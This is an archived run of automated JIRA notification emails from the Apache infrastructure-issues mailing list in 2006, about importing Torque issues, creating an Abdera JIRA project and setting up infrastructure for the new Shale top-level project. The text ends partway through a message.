Received: (qmail 19361 invoked by uid 99); 28 Jun 2006 17:53:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 10:53:06 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 10:53:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4F70A7141F4 for <[email protected]>; Wed, 28 Jun 2006 17:51:30 +0000 (GMT) Message-ID: <16251555.1151517090322.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 17:51:30 +0000 (GMT+00:00) From: "Thomas Fischer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-761) Import Torque issues into JIRA In-Reply-To: <1129637360.1142857138319.JavaMail.jira@ajax> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-761?page=comments#action_12418282 ] Thomas Fischer commented on INFRA-761: -------------------------------------- Is there anything the Torque developers can do to help with this issue ? > Import Torque issues into JIRA > ------------------------------ > > Key: INFRA-761 > URL: http://issues.apache.org/jira/browse/INFRA-761 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: JIRA, Scarab > Reporter: Jeff Turner > Assignee: Jeff Turner > Attachments: torque-documentation.tsv, torque-source.tsv > > Torque has a few hundred issues in Scarab, and since Scarab can export these as tab-separated values, we can import them into JIRA. Or at least we can once a) we've upgraded to the upcoming 3.5.4 (INFRA-737) which would include a bugfix for handling TSVs (http://jira.atlassian.com/browse/JRA-9653). -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 28 19:29:35 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99226 invoked from network); 28 Jun 2006 19:29:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jun 2006 19:29:30 -0000 Received: (qmail 10898 invoked by uid 500); 28 Jun 2006 19:29:08 -0000 Delivered-To: [email protected] Received: (qmail 10579 invoked by uid 500); 28 Jun 2006 19:29:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10540 invoked by uid 99); 28 Jun 2006 19:29:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 12:29:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 12:29:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9B5437141F3 for <[email protected]>; Wed, 28 Jun 2006 19:27:30 +0000 (GMT) Message-ID: <21964849.1151522850633.JavaMail.jira@brutus> Date: Wed, 28 Jun 2006 19:27:30 +0000 (GMT+00:00) From: "Garrett Rooney (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-848) Create new Jira Project for Incubator Preoject Abdera In-Reply-To: <29229504.1150608869861.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-848?page=comments#action_12418297 ] Garrett Rooney commented on INFRA-848: -------------------------------------- Ping! Can someone with Jira administrator access please take a look at this? > Create new Jira Project for Incubator Preoject Abdera > ----------------------------------------------------- > > Key: INFRA-848 > URL: http://issues.apache.org/jira/browse/INFRA-848 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: JIRA > Reporter: Gavin > > Hi All, > The new Incubator project 'Abdera' would like to have a new Jira Project. > I tried adding a new request for 'New Jira Project' but the system did not recognise any names I put in there for the Jira Admin. > As Mentors I tried putting in 'Garrett Rooney' and/or 'Paul Querna' as Jira Admin but would not be accepted by the system. > Also, here is a list of initial names to be granted 'dev' status to Abdera Jira (in addition to the two Admin named above). > Sam Ruby > Yoav Shapira > James M Snell > Elias Torres > Robert Yates > Gavin McDonald > Martin Cooper > Stephen Duncan -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 00:23:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79928 invoked from network); 29 Jun 2006 00:23:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 00:23:17 -0000 Received: (qmail 72963 invoked by uid 500); 29 Jun 2006 00:23:09 -0000 Delivered-To: [email protected] Received: (qmail 72696 invoked by uid 500); 29 Jun 2006 00:23:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72681 invoked by uid 99); 29 Jun 2006 00:23:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:23:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:23:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A5069410005 for <[email protected]>; Thu, 29 Jun 2006 00:21:30 +0000 (GMT) Message-ID: <7075205.1151540490673.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 00:21:30 +0000 (GMT+00:00) From: "Henri Yandell (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-848) Create new Jira Project for Incubator Preoject Abdera In-Reply-To: <29229504.1150608869861.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-848?page=all ] Henri Yandell reassigned INFRA-848: ----------------------------------- Assign To: Henri Yandell > Create new Jira Project for Incubator Preoject Abdera > ----------------------------------------------------- > > Key: INFRA-848 > URL: http://issues.apache.org/jira/browse/INFRA-848 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: JIRA > Reporter: Gavin > Assignee: Henri Yandell > > Hi All, > The new Incubator project 'Abdera' would like to have a new Jira Project. > I tried adding a new request for 'New Jira Project' but the system did not recognise any names I put in there for the Jira Admin. > As Mentors I tried putting in 'Garrett Rooney' and/or 'Paul Querna' as Jira Admin but would not be accepted by the system. > Also, here is a list of initial names to be granted 'dev' status to Abdera Jira (in addition to the two Admin named above). > Sam Ruby > Yoav Shapira > James M Snell > Elias Torres > Robert Yates > Gavin McDonald > Martin Cooper > Stephen Duncan -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 00:27:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80710 invoked from network); 29 Jun 2006 00:27:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 00:27:10 -0000 Received: (qmail 77023 invoked by uid 500); 29 Jun 2006 00:27:08 -0000 Delivered-To: [email protected] Received: (qmail 76707 invoked by uid 500); 29 Jun 2006 00:27:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76695 invoked by uid 99); 29 Jun 2006 00:27:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:27:06 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:27:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C81BC7141E0 for <[email protected]>; Thu, 29 Jun 2006 00:25:29 +0000 (GMT) Message-ID: <13908927.1151540729787.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 00:25:29 +0000 (GMT+00:00) From: "Craig McClanahan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-866) Create Shale TLP MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Create Shale TLP ---------------- Key: INFRA-866 URL: http://issues.apache.org/jira/browse/INFRA-866 Project: Infrastructure Type: Task Security: public (Regular issues) Reporter: Craig McClanahan As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: #======================================= [1] Root Tasks (do these need to be mailed separately?) Create unix group "shale" Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew Create new DNS entry "shale.apache.org" and configure into website server instance #======================================= [2] Mailing Lists [2.1] Addresses [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [2.2] Setup Characteristics All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. PMC list should also require moderation for subscription requests [2.3] Initial Moderators For All Lists Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) James Mitchell <[email protected]> Wendy Smoak <[email protected]> Gary VanMatre <[email protected]> [2.4] Archives http://shale.apache.org/mail/dev/YYYYMM.gz http://shale.apache.org/mail/users/YYYYMM.gz http://shale.apache.org/mail/commits/YYYYMM.gz http://shale.apache.org/mail/issues/YYYYMM.gz http://shale.apache.org/mail/notifications/YYYYMM.gz http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) #======================================= [3] Source Tracker As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. Commit notifications should go to [email protected] #======================================= [4] Initial Committer list Craig McClanahan <[email protected]> James Mitchell <[email protected]> Greg Reddin <[email protected]> Sean Schofield <[email protected]> Wendy Smoak <[email protected]> Gary VanMatre <[email protected]> Matthias Wessendorf <[email protected] -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 00:33:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83335 invoked from network); 29 Jun 2006 00:33:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 00:33:11 -0000 Received: (qmail 87591 invoked by uid 500); 29 Jun 2006 00:33:09 -0000 Delivered-To: [email protected] Received: (qmail 87282 invoked by uid 500); 29 Jun 2006 00:33:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87265 invoked by uid 99); 29 Jun 2006 00:33:08 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:33:08 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:33:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F1F64410005 for <[email protected]>; Thu, 29 Jun 2006 00:31:30 +0000 (GMT) Message-ID: <23986825.1151541090978.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 00:31:30 +0000 (GMT+00:00) From: "Craig McClanahan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-866) Create Shale TLP In-Reply-To: <13908927.1151540729787.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-866?page=all ] Craig McClanahan updated INFRA-866: ----------------------------------- Description: As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: #======================================= [1] Root Tasks (do these need to be mailed separately?) Create unix group "shale" Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew Create new DNS entry "shale.apache.org" and configure into website server instance #======================================= [2] Mailing Lists [2.1] Addresses [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [2.2] Setup Characteristics All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. PMC list should also require moderation for subscription requests [2.3] Initial Moderators For All Lists Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) James Mitchell <[email protected]> Wendy Smoak <[email protected]> Gary VanMatre <[email protected]> [2.4] Archives http://shale.apache.org/mail/dev/YYYYMM.gz http://shale.apache.org/mail/users/YYYYMM.gz http://shale.apache.org/mail/commits/YYYYMM.gz http://shale.apache.org/mail/issues/YYYYMM.gz http://shale.apache.org/mail/notifications/YYYYMM.gz http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) #======================================= [3] Source Repository As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. Commit notifications should go to [email protected] #======================================= [4] Issue Tracker We'd like to stick with JIRA, and are open to being in either the common JIRA instance, the Struts one, or a new instance just for Shale. #======================================= [5] Wiki New wiki instance "http://wiki.apache.org/shale" on MoinMoin. #======================================= [6] Initial Committer list Craig McClanahan <[email protected]> James Mitchell <[email protected]> Greg Reddin <[email protected]> Sean Schofield <[email protected]> Wendy Smoak <[email protected]> Gary VanMatre <[email protected]> Matthias Wessendorf <[email protected] was: As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: #======================================= [1] Root Tasks (do these need to be mailed separately?) Create unix group "shale" Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew Create new DNS entry "shale.apache.org" and configure into website server instance #======================================= [2] Mailing Lists [2.1] Addresses [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [2.2] Setup Characteristics All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. PMC list should also require moderation for subscription requests [2.3] Initial Moderators For All Lists Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) James Mitchell <[email protected]> Wendy Smoak <[email protected]> Gary VanMatre <[email protected]> [2.4] Archives http://shale.apache.org/mail/dev/YYYYMM.gz http://shale.apache.org/mail/users/YYYYMM.gz http://shale.apache.org/mail/commits/YYYYMM.gz http://shale.apache.org/mail/issues/YYYYMM.gz http://shale.apache.org/mail/notifications/YYYYMM.gz http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) #======================================= [3] Source Tracker As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. Commit notifications should go to [email protected] #======================================= [4] Initial Committer list Craig McClanahan <[email protected]> James Mitchell <[email protected]> Greg Reddin <[email protected]> Sean Schofield <[email protected]> Wendy Smoak <[email protected]> Gary VanMatre <[email protected]> Matthias Wessendorf <[email protected] Forgot issue tracker and wiki, inserted as items [4] and [5]. > Create Shale TLP > ---------------- > > Key: INFRA-866 > URL: http://issues.apache.org/jira/browse/INFRA-866 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Reporter: Craig McClanahan > > As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: > #======================================= > [1] Root Tasks (do these need to be mailed separately?) > Create unix group "shale" > Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew > Create new DNS entry "shale.apache.org" and configure into website server instance > #======================================= > [2] Mailing Lists > [2.1] Addresses > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [2.2] Setup Characteristics > All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. > PMC list should also require moderation for subscription requests > [2.3] Initial Moderators For All Lists > Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) > James Mitchell <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > [2.4] Archives > http://shale.apache.org/mail/dev/YYYYMM.gz > http://shale.apache.org/mail/users/YYYYMM.gz > http://shale.apache.org/mail/commits/YYYYMM.gz > http://shale.apache.org/mail/issues/YYYYMM.gz > http://shale.apache.org/mail/notifications/YYYYMM.gz > http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) > #======================================= > [3] Source Repository > As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. > Commit notifications should go to [email protected] > #======================================= > [4] Issue Tracker > We'd like to stick with JIRA, and are open to being in either the common JIRA instance, the Struts one, or a new instance just for Shale. > #======================================= > [5] Wiki > New wiki instance "http://wiki.apache.org/shale" on MoinMoin. > #======================================= > [6] Initial Committer list > Craig McClanahan <[email protected]> > James Mitchell <[email protected]> > Greg Reddin <[email protected]> > Sean Schofield <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > Matthias Wessendorf <[email protected] -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 00:43:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88338 invoked from network); 29 Jun 2006 00:43:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 00:43:13 -0000 Received: (qmail 2870 invoked by uid 500); 29 Jun 2006 00:43:11 -0000 Delivered-To: [email protected] Received: (qmail 2577 invoked by uid 500); 29 Jun 2006 00:43:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2562 invoked by uid 99); 29 Jun 2006 00:43:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:43:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 17:43:07 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8C2F1410008 for <[email protected]>; Thu, 29 Jun 2006 00:41:31 +0000 (GMT) Message-ID: <6128081.1151541691571.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 00:41:31 +0000 (GMT+00:00) From: "Henri Yandell (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-848) Create new Jira Project for Incubator Preoject Abdera In-Reply-To: <29229504.1150608869861.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-848?page=all ] Henri Yandell reassigned INFRA-848: ----------------------------------- Assign To: Garrett Rooney (was: Henri Yandell) Jira project setup - 'rooneg' is a member of the abdera-developers jira group and is a jira-administrator to boot (which lets him add new people to abdera-developers via the Jira Administration->User-Browser-><user>->Groups page). Emails to [email protected]. Assigning to Garrett to take care of figuring out people's jira ids (Paul has two equally grouped ones for example) and adding to abdera-developers. > Create new Jira Project for Incubator Preoject Abdera > ----------------------------------------------------- > > Key: INFRA-848 > URL: http://issues.apache.org/jira/browse/INFRA-848 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: JIRA > Reporter: Gavin > Assignee: Garrett Rooney > > Hi All, > The new Incubator project 'Abdera' would like to have a new Jira Project. > I tried adding a new request for 'New Jira Project' but the system did not recognise any names I put in there for the Jira Admin. > As Mentors I tried putting in 'Garrett Rooney' and/or 'Paul Querna' as Jira Admin but would not be accepted by the system. > Also, here is a list of initial names to be granted 'dev' status to Abdera Jira (in addition to the two Admin named above). > Sam Ruby > Yoav Shapira > James M Snell > Elias Torres > Robert Yates > Gavin McDonald > Martin Cooper > Stephen Duncan -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 01:30:15 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3170 invoked from network); 29 Jun 2006 01:30:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 01:30:14 -0000 Received: (qmail 56436 invoked by uid 500); 29 Jun 2006 01:30:08 -0000 Delivered-To: [email protected] Received: (qmail 56118 invoked by uid 500); 29 Jun 2006 01:30:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56107 invoked by uid 99); 29 Jun 2006 01:30:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 18:30:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 18:30:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2E01F410005 for <[email protected]>; Thu, 29 Jun 2006 01:28:30 +0000 (GMT) Message-ID: <22995232.1151544510169.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 01:28:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-866) Create Shale TLP In-Reply-To: <13908927.1151540729787.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-866?page=comments#action_12418360 ] Brett Porter commented on INFRA-866: ------------------------------------ some things: - the new convention for PMC lists is "private@"..., the archive won't be available via the website. - please hold off doing the SVN move until the commits list is set up correctly. - your existing JIRA issues will need to stay in the same instance that they are currently in (I assume that's the struts one as I don't see them here) - I'm assuming you don't have any existing lists to migrate to these new ones. I'll check with the rest of infra how we move forward on the root tasks as there are a couple pending. > Create Shale TLP > ---------------- > > Key: INFRA-866 > URL: http://issues.apache.org/jira/browse/INFRA-866 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Reporter: Craig McClanahan > > As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: > #======================================= > [1] Root Tasks (do these need to be mailed separately?) > Create unix group "shale" > Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew > Create new DNS entry "shale.apache.org" and configure into website server instance > #======================================= > [2] Mailing Lists > [2.1] Addresses > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [email protected] > [2.2] Setup Characteristics > All lists except pmc should be set up to require subscription before posting, have the Reply-To header set, and suppress trailers. > PMC list should also require moderation for subscription requests > [2.3] Initial Moderators For All Lists > Craig McClanahan <[email protected]> (may also need <[email protected]> if moderation is fussy about Sender: heading) > James Mitchell <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > [2.4] Archives > http://shale.apache.org/mail/dev/YYYYMM.gz > http://shale.apache.org/mail/users/YYYYMM.gz > http://shale.apache.org/mail/commits/YYYYMM.gz > http://shale.apache.org/mail/issues/YYYYMM.gz > http://shale.apache.org/mail/notifications/YYYYMM.gz > http://shale.apache.org/mail/pmc/YYYYMM.gz (Restricted access???) > #======================================= > [3] Source Repository > As PMC chair, I volunteer to be a Subversion admin, and can set up the new space, authorizations, and copy/move old sources myself. > Commit notifications should go to [email protected] > #======================================= > [4] Issue Tracker > We'd like to stick with JIRA, and are open to being in either the common JIRA instance, the Struts one, or a new instance just for Shale. > #======================================= > [5] Wiki > New wiki instance "http://wiki.apache.org/shale" on MoinMoin. > #======================================= > [6] Initial Committer list > Craig McClanahan <[email protected]> > James Mitchell <[email protected]> > Greg Reddin <[email protected]> > Sean Schofield <[email protected]> > Wendy Smoak <[email protected]> > Gary VanMatre <[email protected]> > Matthias Wessendorf <[email protected] -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 29 01:51:13 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7742 invoked from network); 29 Jun 2006 01:51:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Jun 2006 01:51:09 -0000 Received: (qmail 81551 invoked by uid 500); 29 Jun 2006 01:51:08 -0000 Delivered-To: [email protected] Received: (qmail 81279 invoked by uid 500); 29 Jun 2006 01:51:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81267 invoked by uid 99); 29 Jun 2006 01:51:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 18:51:07 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jun 2006 18:51:06 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 35DC9410005 for <[email protected]>; Thu, 29 Jun 2006 01:49:30 +0000 (GMT) Message-ID: <25084243.1151545770190.JavaMail.jira@brutus> Date: Thu, 29 Jun 2006 01:49:30 +0000 (GMT+00:00) From: "Craig McClanahan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-866) Create Shale TLP In-Reply-To: <13908927.1151540729787.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-866?page=comments#action_12418365 ] Craig McClanahan commented on INFRA-866: ---------------------------------------- Thanks Brett ... replies to your comments. For the PMC list, "private@..." is fine. We'll wait on SVN moving until everything is set up. Our JIRA issues are indeed in the Struts instance, so that's fine. You are correct that we have no existing mailing lists to be migrated > Create Shale TLP > ---------------- > > Key: INFRA-866 > URL: http://issues.apache.org/jira/browse/INFRA-866 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Reporter: Craig McClanahan > > As approved by the Board at the June 2006 meeting, please set up the infrastrcture for the Shale TLP: > #======================================= > [1] Root Tasks (do these need to be mailed separately?) > Create unix group "shale" > Add following usernames to group "shale": craigmcc, jmitchell, greddin, schof, wsmoak, gvanmatre, matzew > Create new DNS entry "shale.apache.org" and configure into website server instance > #======================================= > [2] Mailing Lists > [2.1] Addresses > [email 